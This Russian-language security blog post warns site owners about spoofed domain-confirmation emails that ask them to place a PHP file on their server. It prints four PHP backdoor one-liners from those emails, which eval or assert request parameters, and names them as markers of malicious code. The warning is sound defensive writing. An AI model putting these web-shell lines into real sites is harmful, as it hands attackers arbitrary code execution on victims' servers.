Не доверяйте поддельным письмам с подтверждением домена
Если вы когда-либо получите письмо с просьбой создать, загрузить или установить какой-либо PHP-код на ваш сайт, вы должны его игнорировать.
English version: Do not trust those fake domain confirmation emails
Недавно некоторые из моих клиентов получили странные письма по электронной почте от своих регистраторов доменов. Эти письма содержат запрос на подтверждение их собственных доменов. Я проверил одно из этих писем и быстро определил, что это мошенническое письмо . Все письма имеют идентичный шаблон и запрос на создание файла PHP в корневой папке на веб-сайте с определенным именем и заданным содержимым. Излишне говорить, что предлагаемое содержимое для этого файла PHP содержит вредоносный код, известный как код бэкдора. Этот вид кода позволяет злоумышленнику выполнять любые действия на веб-сайте жертвы.
Если вы когда-нибудь получите письмо любого рода с просьбой создать, загрузить или установить какой-либо PHP-код на ваш сайт, вы должны его проигнорировать. Никаких исключений. Даже если письмо придет от президента или вашей мамы.
Мошеннические письма кажутся законными из-за законного адреса электронной почты From . Но это подделка электронной почты. Вы не ожидаете получить поддельное письмо от своих друзей или регистратора домена. Верно? Нет! Любое письмо электронной почты может содержать любой адрес электронной почты From. Подавляющее большинство серверов и клиентов электронной почты не проверяют и не подтверждают адрес отправителя. Поэтому вы видите, что это разыскивается хакер. Вы не должны доверять никакому письму электронной почты, полученному от известного отправителя, если письмо содержит запрос на какое-либо подозрительное действие, например установку кода на ваш веб-сайт или приложение на вашем компьютере.
Технические подробности
Поддельные электронные письма обычно содержат некоторые из следующих строк PHP.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
К вашему сведению: base64_decode, eval и assert — общеизвестные маркеры подозрительного или вредоносного PHP-кода.
См. также: Plugin Inspector выявляет проблемы безопасности в других плагинах